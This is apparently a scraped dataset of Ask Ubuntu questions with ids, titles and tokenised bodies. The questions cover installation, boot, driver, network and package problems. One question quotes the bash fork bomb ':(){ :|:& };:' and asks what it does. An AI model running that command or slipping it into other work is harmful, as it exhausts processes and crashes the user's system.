316893	error : partition table requires a separate partition for boot loader code ( efi issue )	the issue i 'm trying to install ubuntu 12.04 ( 64-bit , mac alternate ) on my 13 '' macbook pro ( model 7,1 . mid-2010 ) . the macbook pro is running osx 10.8.3 and i 'm trying to make it dual-bootable ( i.e. , so i can boot into ubuntu or osx ) . when booting from the live cd and selecting `` try ubuntu , '' i made the allegedly necessary partition tables and was ready to install . through the installation process , i selected my newly created `` ext4 '' partition , changed it ( in the installer ) to `` use as ext4 journaling file system , '' and pressed continue . however , the following window popped up : below is a snapshot of my partition table in gparted . below is a snapshot of the installation window . the hypothesis @ seth and i are geared towards thinkhing this is an issue with ubuntu not detecting that my computer is using efi instead of bios . i think that if we somehow get ubuntu to recognize that i 'm running a computer that uses efi , the installation will run smoother . however , because i 'm running on a macbook pro , users who 've had similar problems with windows wo n't have the same solutions for me ( or other future problem-havers ) to use . things tried & investigated below are things that i 've tried and looked into . i 'll be updating it as this issue progresses . i 've tried researching this issue , and came across this thread as well . after discussing this issue with people in the chat room , though , i 'm -- we 're -- pretty sure it 's a hardware issue . additionally , i tried this wiki , but the wiki looks geared towards windows and , again , i 'm pretty sure this is a hardware-specific issue . update : i went ahead and tried the section i linked to , and it did n't entirely workout . when following the instructions , i was n't able to click onto the `` grub location '' tab because it was disabled : another untried option @ seth and i went over was bypassing the error , then running the boot-repair program listed above . there are concerns about this being dangerous , though , so i 'd be glad to hear another opinion . i 've tried the solution provided by @ rod-smith . however , as apparent in the comments on his answer , i ran into some issues . when trying the alternate steps under step 10 , booting up just got me a blank screen that would n't go away ( the most recent amount of time that i 've spent on that screen was about 40 minutes until i rebooted ) . continuing to follow the instructions , before step 18 shows up ( which it never does ) , i get the following error : warning : no console will be available to os error : no suitable video mode found . ( see image ) while keeping the partitions/all settings as setup by my explanation in the fourth item ( above ) , i tried the link in the second item above because grub was installed . i could access the menu and i ran through everything needed to be done . however , upon reboot , i ran into the same indefinite blank screen . in accordance with @ themysteriousman 's post , i 've also tried selecting /dev/sda1 to install the boot loader on , but i received the same error . the ubuntu 13.04 ( 64-bit , mac alternate ) has been tried also , but again , the same error is received . something i 've noticed is that when double clicking on a partition ( while in the installation process seen in the 3rd photo of this post ) and bringing up the `` edit partition '' window , under the `` use as : '' drop down ( where options like `` ext4 journaling file system '' appear ) , i have the option `` reserved bios boot area . '' i 'm wondering if the error is asking me to do something with the option . if it is asking me to use this option , should i create a new partition and set this option on it ? how big should the partition be ? or do i put it on an existing partition ? tldr & the question the main question here is : how do i get by this error message ? is there some configuration i have to do that i have n't already ? or is this a safe error message to bypass ?
316894	software center shows none of my purchases	on both my chrubuntu acer c7 laptop , and on my desktop box , this week , the software center shows a blank screen when i select `` reinstall previous purchases . '' in other words , it says that i have no purchases at all . i `` purchased '' a couple of free programs in the for purchase menu , so i could verify that my username & password were valid . both times , it asked for my launchpad id & password , accepted them , and downloaded & installed the program . then i selected `` reinstall previous purchases . '' another blank screen . does anyone have a reason or solution for this ?
316899	stuck on purple loading screen	i just downloaded ubuntu 13.04 today . it was running slow , so i tried the enlightenment e17 desktop . i did n't like it and was getting an error message when trying to use the software manager , so i was going to restart and go back to the original . when i restarted , i got stuck on the purple ubuntu loading screen . the terminal still works ( ctrl+alt+f2 ) , but nothing happens on the screen . i 'm using a hp compaq dc5700 microtower intel pentium d , 1 g of ram . thanks for any help !
316900	ok ... i just need help here ... possibly advice	so i 'm trying to upgrade to the newest install , build , whatever you call it of ubuntu . i 've never used anything but windows before , but this computer was given to me ( by a neighbor being evicted no less ) with the current os ( ubuntu 12.04 ) , and i have no cash to go out and buy windows . so i discovered early on that i need to install all the pending software updates for 12.04 before upgrading to 12.10 before i can upgrade to 13.whatever . and this is where i run into problems . obviously my neighbor did n't give me a power cord for this thing , let alone any of his passwords . i did some research and figured out how to reset the admin password in root ( here ) and succeeded after several painful attempts ( word of advice mount -o rw , remount / is not at all the same as mount -rw -o remount / ) . this however had no effect on the password required to install this software ( you know where is sais `` authenticate '' and then asks you for a password below . i thought then that perhaps i was dealing with the wrong password and i tried removing all the gnome keyring passwords ( here ) . i was also very successful in this endeavor , but it still has absolutely no effect on the password for installing the software updates ... like none ... at all ... it still does not work , equally as much as before i successfully removed all those passwords . i 've noticed one thing that could be applicable , or it might be utterly unimportant to this situation . the username in root does not match the username in the user accounts menu : let me be specific here : when i type ls /home in root it outputs in shiny blue letters thelionsden but when i look in the user account menu i see the name marc . if i try to change the password for marc in root , it tells me that there is not such username . if i try to change the password for thelionsden ... it thanks me for changing it ( not really , it just changes it ) so what should do ? follow your wonderful method for disabling / removing / recovering and circumventing this authentication password so i can spend the next three days installing updates ( note : you will have to provide said method for this to be a viable solution ) make a boot cd of the newest version of ubuntu and install it , which will ( i am assuming here ) wipe clean this horrible password riddled mess that i have learn to live with outdated software and the woes that come with it ( non working dvd software ... . horrible security breaches ? ) smashing burning or otherwise destroying this computer in a violent manner and then devoting the rest of my life to hunting down the man who gave it to me . thank you for any advice or help.. i am totally going out of my mind right now trying to figure this out .
316903	booting ubuntu in low graphics mode ?	my computer is taking forever to turn on and it is saying that ubuntu is running in low graphic mode . i click run ubuntu in low graphics mode for just one session an it says ubuntu is loading with 5 dots changing color and says like that . i 've sat for one hour and is still not on please help .
316918	gmusicplayer : how to play 1 song repeatedly	in gmusicplayer , how do you play 1 specific song repeatedly ?
316922	server 12.04lts - unable to see lan ever , and only able to see web when reporting an external ip	alright , i 'll try to explain as best i can what 's going on here - i 'm relatively new to linux , but i am familiar with networking . i 'm setting up an old work box as a home-based web server . i started setting it up at the office , and was puzzled that it would n't take my static ip - instead , it would receive a dhcp address . no problem , i thought - i 'll sort that out at home . now that i 'm at home , i ca n't even get it to take a dhcp address within the scope of my home network . i 've been through post after post looking for a solution over the past week , all to no avail . in fact , the only times i 've been able to see the internet from this thing , ifconfig and the nm gui have reported the machine as having an ip that looks an awful lot like my external comcast ip ... which i do n't even understand . i 'm not sure what all people might want to see for diagnostic purposes , but i 'll post the contents of /etc/network/interfaces , /etc/networkmanager/networkmanager.conf and ifconfig for you to start , even though it 's all going to reflect the static address that does n't work . i 'll change it around again if anyone would like to see that - i must have changed ifupdown : managed from false to true and back again a hundred times . anything else you need , please ask ! just to be clear , the ultimate goal here is to sit this guy at a static address ( my preference is 215 , just fyi ) on my lan and to set up port forwarding so i can ssh into it remotely and hit it from the web using a domain i have sitting around . thanks again for your help ! /etc/network/interfaces # loopback auto lo iface lo inet loopback # primary auto eth0 iface eth0 inet static address 192.168.1.215 netmask 255.255.255.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 192.168.1.1 /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=true ifconfig inet addr:192.168.1.215 bcast:192.168.1.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 ( all the packet info is 0 ) interrupt:21 memory : f7fe0000-f8000000
316926	how can i become root at all times in terminal	i want to know how i can become root at all times in terminal without having to type in my password or typing sudo . thanks : d
316929	not shutting down	using raring ringtail on acer v5 ( uefi bios mode ) . the system simply refuses to shut down . i have tried the sudo poweroff as well as shutting down from the system menu . each time it just reboots after shutting down ( whether plugged in or on battery ) .
316930	ubuntu desktop 12.04 partition not showing up in partitioning tools	i recently installed ubuntu desktop 12.04 alongside windows 7 . i only gave the partition about 15 gb of space , as i installed it through the installation gui . i wanted to add some more space to it 's partition , and installed gparted . when i open it , the ubuntu partition does n't show up . i tried using another tool on windows , but it still did n't show . is there any other way to increase the partition size , or have the partition show up ? the windows partitions are there . output from sudo parted -l : model : ata st9500325as ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary fat16 diag 2 106mb 15.8gb 15.7gb primary ntfs boot 3 15.8gb 500gb 484gb primary ntfs 1 is labeled dellutility ( in gparted ) , the dell utility partition 2 is recovery ( recovery partiton ) 3 is windows ' files , called os and mounted at /host ( according to gparted ) in gparted , they are located at dev/sda1 , dev/sda2 , and dev/sda3 update : there is a folder in my c : / drive called ubuntu , and it has two files , which i think are the swap partition and the system files of ubuntu . i 'm pretty sure that everything was installed there , but is there a way to expand the size of that ?
316932	i forgot my root password	how can i reset my password without knowing my password ? i tried changing my password before to a longer and harder password to crack and i wrote it down on word and now i lost the word file and i ca n't remember my password , anyone know how to reset it ? i need to know as soon as possible because it 's nearly 5 am and i need to close my computer but i wo n't be able to log back in without knowing my password
316933	unity not working after ubuntu 13.04 update	so i had recently installed ubuntu 13.04 64-bit on a small home server , and after the most recent update check ( july 5 , 2013 is when i ran it ) my machine will not load unity and usually crashes altogether after a while . i 've tried to reset compiz and unity , tried the most recent kernal in recovery mode , and checked for updates and ran several of the recovery mode utilities . does anyone have an idea of what i can do to fix this without a reinstall ? i 'd really rather not , and i do n't know unix well enough to run just command line all the time . i have an amd a4-5300 apu installed with the amd catalyst drivers installed before this update and they were working fine . thanks ahead . : ) p.s . : keep it simple with instructions please , i 'm not terribly familiar with linux commands and such . : p
316935	what does this command do , and should i execute it from terminal ?	the command is in the following quotations : ( ) { : | : & } ; : . i have a bunch of questions . what does it do ? is it harmful ? what is it , anyway ? how does it work ? what should i know about it ? what type of command is it ? i so far have not tried such a command on my computer , mostly because i do n't simply execute commands without knowledge of what it actually does . i was just wondering what it was , and whether or not it would actually be used or useful .
316936	downloading latest ubuntu ( 13.04 ) + downloading windows programs	i recently downloaded a really old ubuntu version ( i forgot which one ... ) , but it said i should download the latest version of ubuntu to get updated security and such ... so i did , i downloaded the .iso but now i have no idea what to do ... do i put it onto a disk and restart my computer , or what ? i already tried to run the .exe but is n't that for windows only ? also ... since i already ventured into .exe ... how do i download windows programs onto ubuntu ? keep in mind ... i 'm kind of new to ubuntu . thanks : )
316940	gparted to merge partitions	i inherited a laptop about a month ago . the drive has some unused space that i would like to be added to ubuntu . i 'm really not comfortable doing this without some direction . ubuntu 12.04 is on sda8 . i would like to add sda4 and sda7 to sda8 . i ca n't post an image . the drive look likes this : /dev/sda1 fat16 /dev/sda2 ntfs /dev/sda4 ext3 /dev/sda3 extended /dev/sda5 ext3 /dev/sda8 ext4 /dev/sda6 linux-swap /dev/sda7 ext4 thanks and i appreciate any help .
316941	ubuntu 13.04 terminal stops responding/freezes on launch	ubuntu noob here , so i do n't know that much about ubuntu . i know how to get around , and what not , but i still consider myself a noob . anyways , on to the question . recently , in the past 15 minutes , i noticed the terminal stops responding on launch . i do n't even get text . just a grey screen , then it goes dark ( freezes ) , then i have to force quit it . the most recent things i have installed was : -virtual box ( no os ' yet , although i plan to use some . i have n't opened the application yet ) -compiz settings manager - this is when i noticed the terminal acting up . i understand that compiz is a very advanced tool . hear me out though . i was trying to enable the wobbly windows effect , but i forgot to install the essential effects for compiz . i did not mess with anything in compiz at all , i just looked around for the theme . i think it 's mostly compiz settings manager . should i uninstall it and reinstall it ? what gives ? i have rebooted my computer since , and i have seen no changes . thanks in advance , you guys are an awesome community !
316945	mounting droboshare from linux	i am attempting to mount a drobo ( via droboshare attached to the network ) from linux and running into roadblocks and have run out of ideas . when i issue the smbclient -l ipaddress i get the following : domain= [ companydomain ] os= [ unix ] server= [ sambe 3.0.14a ] sharename type comment -- -- -- -- -- -- -- -- -- -- -- -- -- fileshare disk comment entered ipc $ ipc ipc service ( droboshare ) admin $ ipc ipc service ( droboshare ) domain= [ companydomain ] os= [ unix ] server= [ sambe 3.0.14a ] server comment -- -- -- -- -- -- - -- -- -- -- -- -- -- servername droboshare workgroup master -- -- -- -- -- -- - -- -- -- -- -- -- -- localworkgroup from this , if i enter the following command : sudo ntfs-3g //ipaddress/fileshare /mnt/mountpoint ( this directory is created ) i receive this error : ntfs-3g : failed to access volume ( lists ip and share ) : no such file or directory this could be due to attempting to connect with the incorrect file system , though i would think the error would be different . so , does anyone see the issue ? can anyone tell me how i can confirm the filesystem in use on the drobo ? do i need to add some additional packages to enable this connection ? ultimately we would like the mount configured in fstab , but first we need to make sure it works . thanks in advance for any guidance you can offer . greg
316946	how to install ubuntu server on hp proliant microserver n40l ?	i own an hp proliant microserver n40l . what are step-by-step instructions to get it running ubuntu server 12.04 64-bit ? it seems that for now some instructions at least partially outdated . good example is `` installation/fromusbstick '' instruction which consistently recommends crashing ubuntu startup disk creator tool ( the crash was confirmed by many users ) . that puts less experienced users on guess and try way where it 's very easy to make something wrong and get unsuccessful installation experience .
316947	ubuntu wo n't use my nvidia graphics card	i just formatted my laptop and installed ubuntu 13 on it the change from windows 7 to ubuntu is looking good so far but ubuntu does n't seem to detect my graphics card i tried installing the driver from the website but that resulted in my screen going to 640*320 resolution i reinstalled ubuntu and it 's working fine for now my graphics card is nvidia geforce 525m is there anyway i can get the system to recognize it ? edit : i did a little research here and ran ' lshw -c display ' apparently it actually knows that i have the graphics card , it just wo n't show me that it has it movie playback is really slow and laggy because of this , i think . this is what shows on my terminal screen : *-display description : vga compatible controller product : gf108m [ geforce gt 525m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f5000000-f5ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:54 memory : f6400000-f67fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) so it does detect the card , it 's just not using it
316949	lost grub menu after updates	i have 12.04 installed . i made some updates and restarted the computer . now the grub menu only lists 9.04 and windows 7 . can someone help me recover the original grub menu that i need ? thanks .
316950	using existing mysql database in lampp	i 'm using ubuntu 13.04 in a 32 bit machine . i have windows 8 installed also . i have set up lampp in my ubuntu os . now i want to use mysql databases of windows in ubuntus lampp . i have searched a lot online , but could n't find any suitable solution . can anyone help please ?
316952	from where i can backup gmail offline chrome app data for migrating to another ubuntu	i have gmail offline app installed in chrome . it has all my mail messages and attachments sync ( offline stored ) to my computer . now i want to take backup of gmail-offline app data , as to use later on another pc 's chrome . i want to know where it 's storage took place on my system ? ( path of the cookies for chrome on ubuntu ) so i can took backup of that or is there a better way to take backup of this ( gmail-offline ) app 's data . thanks in advance update helpful link i found : where-do-chrome-chromium-and-firefox-store-offline-data
316961	software center not opening ( whitescreen )	i tried to open software center to download adobe ( i recently downloaded ubuntu ) but its just a white screen ... i tried launching it from terminal using the code software-center and got back ( software-center:31802 ) : glib-gio-error ** : no gsettings schemas are installed on the system trace/breakpoint trap keep in mind , i do n't know how to code so i have no idea whats going on ... thanks
316963	can you clean install ubuntu ( clean install , complete wipe ) if using wubi ?	i 'm currently using a dual boot windows vista and ubuntu 12.04 lts ( wubi install ) and i was wondering how to completely wipe the hard drive and install ubuntu 12.04 lts standalone . ps . my computer has a s.m.a.r.t warning on it , removing the usb boot feature , and i do n't have the ability to obtain blank dvd 's . so can i use unetbootin or something similar ? i really need help , because vista only runs in recovery mode . disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc5e4cda2 device boot start end blocks id system /dev/sda1 2048 12840959 6419456 27 hidden ntfs winre /dev/sda2 * 12840960 312576704 149867872+ 7 hpfs/ntfs/exfat disk /dev/sdb : 4007 mb , 4007657472 bytes 5 heads , 32 sectors/track , 48921 cylinders , total 7827456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 8064 7827455 3909696 b w95 fat32
316964	ubuntu wubi ssd windows 7 - new linux instalation	my system : cpu : intel i7 windows 7 16 gb ram disks : 1 tb hdd - partitioned for windows 240 gb ssd primary windows disk 40 gb ssd - not in use - i thought i would install ubuntu here . 2 tb hdd new backup disk for windows and linux ? i want to put linux on my 40 gb ssd and have it backup to a partition on the 2 tb hdd . i use acronis to perform automatic backups . i think i will make my linux partitions ext4 ? should i use wubi ? i 'm not sure if i need it . does anyone have a similar system ? i would like to make some good decisions now , so any help would be appreciated .
316965	multiple resumable file download using wget or other command line download tool ?	i know about wget -c option to allow resuming resumable download , but can i do multiple resumable download with wget or another command line tool ?
316966	arrow keys in terminal shortcut do n't work	i am new to linux and am using ubuntu 13.04 . i have a c++ program named `` dictionary '' ( full path : /home/anmol/desktop/c++/dictionary ) , which i compiled with code : :blocks ide ( and gcc version 4.7.3 ) . i have set up a custom keyboard shortcut for it by going into system settings - > keyboard - > shortcuts and putting command : gnome-terminal -- disable-factory -x /home/anmol/desktop/c++/dictionary . now the problem i face is that the arrow keys inside the terminal are n't working ... for example , whenever i press the left arrow key , i get `` ^ [ [ d '' ... but when i run a terminal normally ( by pressing ctrl+alt+t ) , the arrow keys work fine . now when i googled the problem , i found that this could happen if somehow the default shell had been changed from bash to sh . so in my c++ program , to see what shell was being used as default , i added the line system ( `` chsh '' ) ; just after the main ( ) function and found that the default shell was bash only ! still i tried by adding the line system ( `` chsh -s /bin/bash '' ) but the problem persisted ... ( when i prefixed sudo to the command it threw an error chsh : pam : authentication failure ) ! also , in the code : :blocks environment settings page , i found these 2 settings : shell to run commands in : /bin/sh -c terminal to launch console programs : gnome-terminal -- disable-factory -t $ title -x screenshot : i changed the `` shell to run commands in '' : /bin/bash -c. but the problem still persisted . please guide me on how to correct this !
316968	i lost my xp partition when installing ubuntu alongside win 7	i had a dual boot system with xp and win 7 . i installed ubuntu alongside win 7 . now i dont see my xp option when i reboot just a red sceen with ubuntu and win 7 options . in win7 i see the xp partition is still there and active . how can i get to it ? how can i add it to the red screen with ubuntu and win 7 so i have a 3 option boot ?
316980	how to force font change on chrome ( chromium ) on certain websites ( viz . facebook )	since i started using google chrome ( and chromium ) on ubuntu , i had this bad feeling about changing facebook font ( or forcing the font change in settings on certain websites that have their own css ) . i have spent about 3 years now asking and googling the web how to force font change on chrome ( chromium ) on certain websites , and in my case facebook ? thank you in advance .
316983	any good painting/drawing software for ubuntu ?	i 'm looking for new software to play around with , even though i love mypaint . i 've found that krita is available from the software centre but i 'm still looking for more options . i 've been wanting to try out paint tool sai , but have n't really bothered because it 's only a trial and was n't sure on how to install it in ubuntu .
316990	create table in iptables	i want to create a custom table using iptables so that i can add my custom chains in it . but i does n't see any option to do that . i tried to search for it but didnt found anything . please help .
316996	is it legal to integrate the ubuntu system in my software product ?	i developed a software product which integrates the ubuntu system . i want to sell this software someday . is it legal to integrate the ubuntu system in this software product ? do i need to pay ? or write an application to ubuntu ? `` integrate '' means that i distribute my software product by a cd . and i need to integrate the ubuntu in the cd too . and my software is run on ubuntu system . it is an app on ubuntu . i will not modify ubuntu . i think i do not need to make my software open source .
316998	how can i create a bookmark to the listing of a computer 's network shares ?	i have a server on my network which shares a lot of folder where i keep almost all my data . in my windows enviroment i have a shortcut that goes to `` \server '' which lists all those folders . i am looking for the same in ubuntu . there seems to be a limitation that you can only create shortcuts ( or bookmarks ) to individual folders , like `` \server\pictures '' for example and not to the folder listing . if i go into a folder , that folder will appear under the network headline to the left so i can then right click it and choose `` add bookmark '' . the server wo n't appear there if i just list its shares , therefore i ca n't save a bookmark . is it possible to achieve what i want ?
317003	why is there a skip option when installing ubuntu ?	when installing ubuntu ( 12 . * or 13.04 ) on a machine , there 's a final advertisement-like screen where it shows what software will be installed ( with panels like `` have fun with your photos '' with some details about shotwell , etc ) at the bottom , there 's a progressbar that can be expanded to show a log . there 's also a `` skip '' button . it seems to be enabled even during some seemingly crucial steps . i 've installed ubuntu many times now , however i 've never clicked this button for fear of screwing up the installation1 . what is this button for ? what does it skip ? 1 . i usually make dual boots , so there 's a chance that playing with this may damage the bootloader and then i 'll have to grub rescue , which i 'd rather not do . otherwise i 'd experiment away .
317004	how to completely deactivate a bluetooth usb device ?	i have a built-in usb device , lsusb | grep `` bluetooth '' outputs : bus 002 device 004 : id 413c:8187 dell computer corp. dw375 bluetooth module this device has hardware issues , it 's not working reliably in windows either . ( it works in linux after a sudo hciconfig hci0 reset , but after a suspend to ram , the device sometimes completely disappears , sometimes it can not be re-activated , issues , issues ... ) i rather use an external bluetooth dongle , but i do not want to waste battery power on this internal device . disabling in bios is no alternative , as the bios is password protected by company policy . blacklisting ? edit : running latest bios firmware
317022	analog audio recognized by alsa , but not by pulseaudio	i 'm running ubuntu 12.04 on zotac id84 sudo aplay -l : card 0 : intel [ hda intel ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 sudo aplay /usr/share/sounds/alsa/front_center.wav : playing wave '/usr/share/sounds/alsa/front_center.wav ' : signed 16 bit little endian , rate 48000 hz , mono the sound is really played on the speakers ! but in the list of devices on pulseaudio gui control panel i see only digital output ( s/pdif ) hdmi / displayport when i select hdmi , i hear sound through hdmi correctly . when i select digital output , i hear nothing ( as expected ) . can somebody tell me please how to find the `` analog output '' option ? update i reinstalled the system from scratch . now i still see no `` analog output '' option in the list of devices , but while no device is selected in the list , i enjoy listening sound through speakers . if now i choose anything from the list , then i can not `` unselect '' it and sound wo n't play again ... so my question is still relevant .
317023	mouse stopped working , checked htop , and holy wow my kcore file is 140 petabytes ! ! ( see screen shot )	my mouse suddenly stopped working on my ubuntu plex server v12.04 lts . it still works as a remote plex server so i 'm not too concerned . but i did try to login locally with it and ran htop to see if i could find out what was going on . then i went to the /proc directory and did a ls -la and low and behold surrounded by a bunch of `` 0 '' byte files and folders the kcore file reads as : 140,737,486,266,368 = 140 petabytes what 's up with this ?
317027	how do i install and reference qtlocation 5.0 ?	i am trying to run a sample application in qt creator which has an import qtlocation 5.0 statement at the top . i have already installed the ubuntu sdk . i searched the software center for qt5location and i see that i have `` qtlocation-dev '' installed . i do n't know if this is the library that i am looking for , but if it is , i do n't know what the path to this library is . what path should i add to the .qmlproject importpaths so that i can get qtlocation 5.0 working ? if not a path , what do i need to install ?
317028	chromebook boot pendrive	i want to create bootable ubuntu-live pendrive on chromebook . i have crouton ( 13.04 , kde ) , but the usb-creator-kde package is not included . i tried to install unetbootin , grub , syslinux , but none of them succeeded . does anyone have the solutions ? thanks
317031	how to run specific commands without to press enter key	how can i run a specific command in terminal without to press enter key after i typed the command ?
317035	how to grow raid 1 following disk upgrade ?	i have successfuly replaced 2 x 320gb disks with 2 x 1tb and re-synched /dev/md0 & /dev/md1 . `` sudo mdadm -- grow /dev/md0 -- size=max '' results in error `` mdadm : component size of /dev/md0 unchanged at 304686016k '' how can i grow /dev/md0 to the full 1tb ? output from fdisk -l & cat /proc/mdstat follows disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bccd9 device boot start end blocks id system /dev/sda1 * 2048 609374207 304686080 fd linux raid autodetect /dev/sda2 609374208 624998399 7812096 fd linux raid autodetect disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000baab1 device boot start end blocks id system /dev/sdb1 * 2048 609374207 304686080 fd linux raid autodetect /dev/sdb2 609374208 624998399 7812096 fd linux raid autodetect disk /dev/md1 : 7999 mb , 7999520768 bytes 2 heads , 4 sectors/track , 1953008 cylinders , total 15624064 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table disk /dev/md0 : 312.0 gb , 311998480384 bytes 2 heads , 4 sectors/track , 76171504 cylinders , total 609372032 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table mick @ mick-desktop : ~/desktop $ cat /proc/mdstat personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sdb1 [ 1 ] sda1 [ 0 ] 304686016 blocks [ 2/2 ] [ uu ] md1 : active raid1 sdb2 [ 1 ] sda2 [ 0 ] 7812032 blocks [ 2/2 ] [ uu ] unused devices : < none >
317039	where to see or set a color-depth for display with intel 82865g integrated graphics in ubuntu 12.04 lts	in resolution hd 1920x1280 with intel graphics in ubuntu 12.04 lts i asked for help with resolution . as i tell in my answer , now i need to set or at least see if the color depth is really full-color 32 bit in the ubuntu , as i am used with the same pc and windows . i am new with ubuntu ; i do not see such setting in the 'system settings ' ... 'display ' . thanks for helping me , tomas peceny now i see that i took the value 32 bit without thinking from the windows xp display setup properties dialog . i have never used more than 3 bytes r , g and b , that is 24 bit . tomas peceny , 9.7.2013
317044	how do i install nxfilter ?	i want to install nxfilter for internet filtering . how can i install this in ubuntu 12.04 ?
317045	ubuntu 13.04 - can not start kile	i have installed kile via ubuntu software center . i wanted to start it . on startup i receive following message : it does n't matter if i choose no or yes program crushes . here is terminal output : $ kile kile ( 9782 ) /kdecore ( klibrary ) findlibraryinternal : plugins should not have a 'lib ' prefix : `` libkonsolepart.so '' kile ( 9782 ) /konsole konsole : :session : :run : attempted to re-run an already running session . the program 'kile ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 1443 error_code 3 request_code 20 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) kile ( 9782 ) /konsole konsole : :sessionmanager : :~sessionmanager : konsole sessionmanager destroyed with sessions still alive i have tried to run kile -- sync , but result is the same . please help . i need it to work on my master of science thesis .
317060	ubuntu software center remove configuration files	synaptic has options to remove the configuration files during uninstall , and i thought this was because the back-end apt-get has this as a parameter . how do i access this feature from the ubuntu software centre , which replaces synaptic as the default package manager software for ubuntu ? i have a program which seems to have saved a configuration file wrong ( lierolibre ) and now it just wont run at all . i tried reinstalling it to no avail . [ edit ] ok , installed synaptic and found its complete removal option does n't actually remove ~/.folders that the program creates . deleted ./lierolibre and it ran fine after that . should n't those types of folders be considered configuration stuff ?
317071	stuck on `` waiting for apt-get to exit '' in software centre	i 'm trying to download something , and it 's stuck on `` waiting for apt-get to exit '' . also , when i 'm trying to use the terminal it says `` unable to lock the administration directory '' after i type in a command .
317075	unable to install or update anything in 12.04	recently i ran into a problem which seemed pretty similar to that described in this post : how do i deal with `` unauthenticated sources '' errors in the software center ? i was receiving this error message anyway- requires installation of untrusted packages : the action would require the installation of packages from not authenticated sources . i had tried to download installations and updates from a variety of different sources , but all returned the same message . likewise sudo apt-get update/upgrade/install failed . so i tried what was suggested in the above post : sudo apt-get clean cd /var/lib/apt sudo mv lists lists.old sudo mkdir -p lists/partial sudo apt-get clean sudo apt-get update but then when i open software center the install button has disappeared , not greyed out , totally missing . from terminal , if i try to install anything , it returns reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update returns : w : failed to fetch http : //ftp.heanet.ie/pub/ubuntu/dists/precise-security/universe/i18n/translation-en unable to connect to 213.94.177.16:80 : e : some index files failed to download . they have been ignored , or old ones used instead . this maybe an awful noob statement , but that ip address stays the same no matter what server i direct update manager to download from . finally , upgrade , for what it 's worth , returns : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i also uninstalled ubuntu software , hoping against hope that somehow i 'd get it reinstalled and somehow that would fix everything . i 'm a bit out of my depth here and would very much appreciate any help anyone can give me . i really hope there is some way to fix this problem without reinstalling the os .
317079	ca n't sshing to ubuntu via hostname and port other than 22	i 'm trying to connect to ubuntu via ssh from os x , and i took the same step as explained in this page ( https : //help.ubuntu.com/10.04/serverguide/openssh-server.html ) . after setting it , i tried to connect by the form of username @ ip_address , then it was successful and i was able to be in ubuntu from os x terminal ( this time i used port 22 ) . however , when i tried to ssh to ubuntu by the form of username @ hostname , then i could n't and the error ssh : could not resolve hostname my_user_name : nodename nor servname provided , or not known occurred . i also tried to connect via port 2222 by changing /etc/ssh/sshd_config , then it failed too by spitting out the error debug1 : connect to address my_ip_address port 22 : connection refused ( this time i tried to connect by ip address ) . so i think the latter issue stems from the fact that i have to make some sort of modifications also on os x , but do n't know where/how to do and do n't know it 's true in the first place . the former issue is more annoying , as i 'm not sure whether i could understand it correctly . i used hostname as the value that i got from running hostname on ubuntu terminal ... but is it right ? and when i searched for the issue on the web , i knew that it 's from dns issue ... but do n't know what it is and how to fix it ... thanks .
